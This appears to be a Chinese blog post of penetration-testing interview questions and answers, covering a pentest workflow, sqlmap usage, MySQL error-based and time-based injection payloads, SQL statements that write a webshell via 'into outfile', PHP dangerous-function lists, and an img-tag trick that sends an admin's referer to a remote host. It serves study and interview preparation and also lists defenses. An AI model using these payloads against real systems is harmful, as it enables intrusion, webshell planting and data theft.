美文网首页
渗透面试流程

渗透面试流程

作者: wind_飘 | 来源:发表于2019-10-08 16:25 被阅读0次

1,做一下简单的自我介绍,经历,工作经验,爱好,自己总结。

面试题:

一,给你一个网站你是如何来渗透测试的?

在获取书面授权的前提下。

1)信息收集,

1,获取域名的whois信息,获取注册者邮箱姓名电话等。

2,查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。

3,查看服务器操作系统版本,web中间件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞

4,查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如 rsync,心脏出血,mysql,ftp,ssh弱口令等。

5,扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄漏,比如php探针

6,google hack 进一步探测网站的信息,后台,敏感文件

2)漏洞扫描

开始检测漏洞,如XSS,XSRF,sql注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含,

远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等

3)漏洞利用

利用以上的方式拿到webshell,或者其他权限

4)权限提升

提权服务器,比如windows下mysql的udf提权,serv-u提权,windows低版本的漏洞,如iis6,pr,巴西烤肉,

linux藏牛漏洞,linux内核版本漏洞提权,linux下的mysql system提权以及oracle低权限提权

5) 日志清理

6)总结报告及修复方案

一,sqlmap,怎么对一个注入点注入?

1)如果是get型号,直接,sqlmap -u "诸如点网址".

2) 如果是post型诸如点,可以sqlmap -u "注入点网址” --data="post的参数"

3)如果是cookie,X-Forwarded-For等,可以访问的时候,用burpsuite抓包,注入处用*号替换,放到文件里,然后sqlmap -r "文件地址"

二,nmap,扫描的几种方式

三,sql注入的几种类型?

1)报错注入

2)bool型注入

3)延时注入

4)宽字节注入

四,报错注入的函数有哪些? 10个

1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】----------------

2)通过floor报错 向下取整

3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

4).geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5).multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6).polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7).multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8).linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9).multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10).exp()select * from test where id=1 and exp(~(select * from(select user())a));

五,延时注入如何来判断?

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

六,盲注和延时注入的共同点?

都是一个字符一个字符的判断

七,如何拿一个网站的webshell?

上传,后台编辑模板,sql注入写文件,命令执行,代码执行,

一些已经爆出的cms漏洞,比如dedecms后台可以直接建立脚本文件,wordpress上传插件包含脚本文件zip压缩包等

八,sql注入写文件都有哪些函数?

select '一句话' into outfile '路径'

select '一句话' into dumpfile '路径'

select '' into dumpfile  'd:\\wwwroot\baidu.com\nvhack.php';

九,如何防止CSRF?

1,验证referer

2,验证token

详细:http://cnodejs.org/topic/5533dd6e9138f09b629674fd

十,owasp 漏洞都有哪些?

1、SQL注入防护方法:

2、失效的身份认证和会话管理

3、跨站脚本攻击XSS

4、直接引用不安全的对象

5、安全配置错误

6、敏感信息泄露

7、缺少功能级的访问控制

8、跨站请求伪造CSRF

9、使用含有已知漏洞的组件

10、未验证的重定向和转发

十一:SQL注入防护方法?

1、使用安全的API

2、对输入的特殊字符进行Escape转义处理

3、使用白名单来规范化输入验证方法

4、对客户端输入进行控制,不允许输入SQL注入相关的特殊字符

5、服务器端在提交数据库进行SQL查询之前,对特殊字符进行过滤、转义、替换、删除。

十二,代码执行,文件读取,命令执行的函数都有哪些?

1,代码执行:eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

2,文件读取:file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

3,命令执行:system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

十三,img标签除了onerror属性外,还有其他获取管理员路径的办法吗?

src指定一个远程的脚本文件,获取referer

十四,img标签除了onerror属性外,并且src属性的后缀名,必须以.jpg结尾,怎么获取管理员路径。

1,远程服务器修改apache配置文件,配置.jpg文件以php方式来解析

AddType application/x-httpd-php .jpg

<img src=http://xss.tv/12.jpg>会以php方式来解析

相关文章

  • 渗透面试流程

    1,做一下简单的自我介绍,经历,工作经验,爱好,自己总结。 面试题: 一,给你一个网站你是如何来渗透测试的? 在获...

  • Metasploit基础

    渗透测试流程和类型 渗透测试流程 渗透测试执行标准(PTES:Penetration Testing Execut...

  • 二、渗透测试基本流程

    菜鸟学习笔记,请多多指教! 渗透测试流程 2.1 渗透测试基本流程   渗透测试的基本流程主要分为以下几步:  1...

  • python web渗透测试工具学习1:Web应用渗透测试简介

    Web应用渗透测试简介 Web渗透测试流程 典型的Web应用工具包 测试环境 Web渗透测试流程 在本节中,我们将...

  • python web渗透测试学习1:Web应用渗透测试简介

    Web应用渗透测试简介 Web渗透测试流程 典型的Web应用工具包 测试环境 Web渗透测试流程 在本节中,我们将...

  • 渗透测试流程

    1.明确目标 确定范围 确定规则 确定需求 2.信息搜集 基础信息 系统信息 应用信息 版本信息 服务信息 人员信...

  • 渗透实战之内网渗透流程

    0x00 前言 一个完整的内网渗透过程。 0x01 案例分析 实验环境: 目标环境:10.0.0.0/24, 10...

  • web渗透面试

    渗透测试笔试题 填空题 1.12345的二进制是()2.目前常用的HTTP版本是()3.Burpsuite是用什么...

  • 渗透测试流程(单台服务器)

    针对单台服务器的渗透流程

  • 信息收集

    在渗透测试中一般分为以下几个流程:明确目标、信息收集、渗透测试、后渗透测试、报告文档,虽然各种书籍上对渗透测试的流...

网友评论

      本文标题:渗透面试流程

      本文链接:https://www.haomeiwen.com/subject/vwobjxtx.html